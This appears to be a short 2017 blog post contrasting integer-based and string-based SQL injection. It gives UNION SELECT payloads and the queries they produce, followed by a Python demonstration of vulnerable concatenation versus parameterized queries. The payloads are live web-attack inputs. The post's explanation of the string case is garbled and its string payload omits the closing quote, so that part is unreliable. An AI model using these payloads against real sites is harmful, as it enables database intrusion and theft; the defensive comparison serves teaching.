Wednesday, May 24, 2017
Difference between integer based and string based SQL injection
Hi friends, I had posted a question on hackforums about the difference between string-based and integer-based SQL injection. It can be explained as follows:
integer
SELECT * FROM pages WHERE page_id=10 [inject] order by title limit 1,1
?id=10 union select 1,2,3--
finally you get
SELECT * FROM pages WHERE page_id=10 union select 1,2,3-- order by title limit 1,1
string
SELECT * FROM pages WHERE page_id="10" [inject] order by title limit 1,1
?id=10 union select 1,2,3--+
final:
select * from pages where page_id="10" union select 1,2,3--+ order by title limit 1,1
So in integer-based SQL injection you don't have to put a and in string-based SQL injection you have to put a and a + sign at the end.
the original post here
enjoy
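From the defender's side, the integer and string cases above differ only in where concatenated input lands in the query text. The following added example (not from the original post) runs the post's integer payload against a concatenated numeric query, a concatenated quoted query, and a bound-parameter query. It assumes an in-memory SQLite table named `pages` with constructed rows, uses single quotes for the string literal, and leaves out the `limit 1,1` clause; the function names are hypothetical.

```python
import sqlite3

# Payload string taken from the post's integer example.
PAYLOAD = "10 union select 1,2,3--"

def make_db():
    """Constructed sample data: a three-column pages table."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE pages (page_id INTEGER, title TEXT, body TEXT)")
    db.executemany("INSERT INTO pages VALUES (?, ?, ?)",
                   [(10, "home", "welcome"), (11, "about", "who we are")])
    return db

def page_concat_int(db, raw_id):
    # VULNERABLE: input is pasted into a numeric context, so it is parsed
    # as SQL and the trailing "--" comments out the ORDER BY clause.
    sql = "SELECT * FROM pages WHERE page_id=" + raw_id + " ORDER BY title"
    return db.execute(sql).fetchall()

def page_concat_str(db, raw_id):
    # STILL VULNERABLE: the quotes only hold until the input itself
    # contains a quote character, which closes the literal early.
    sql = "SELECT * FROM pages WHERE page_id='" + raw_id + "' ORDER BY title"
    return db.execute(sql).fetchall()

def page_param(db, raw_id):
    # HARDENED: validate the type, then bind the value. The driver sends
    # data separately from the SQL text, so the context no longer matters.
    try:
        page_id = int(raw_id)
    except ValueError:
        return []
    sql = "SELECT * FROM pages WHERE page_id=? ORDER BY title"
    return db.execute(sql, (page_id,)).fetchall()

if __name__ == "__main__":
    db = make_db()
    for fn in (page_concat_int, page_concat_str, page_param):
        print(fn.__name__, "normal :", fn(db, "10"))
        print(fn.__name__, "payload:", fn(db, PAYLOAD))
```

Only `page_concat_int` returns the extra `(1, 2, 3)` row for this payload; the quoted version treats it as one string that matches nothing, and the bound version rejects it before the query runs.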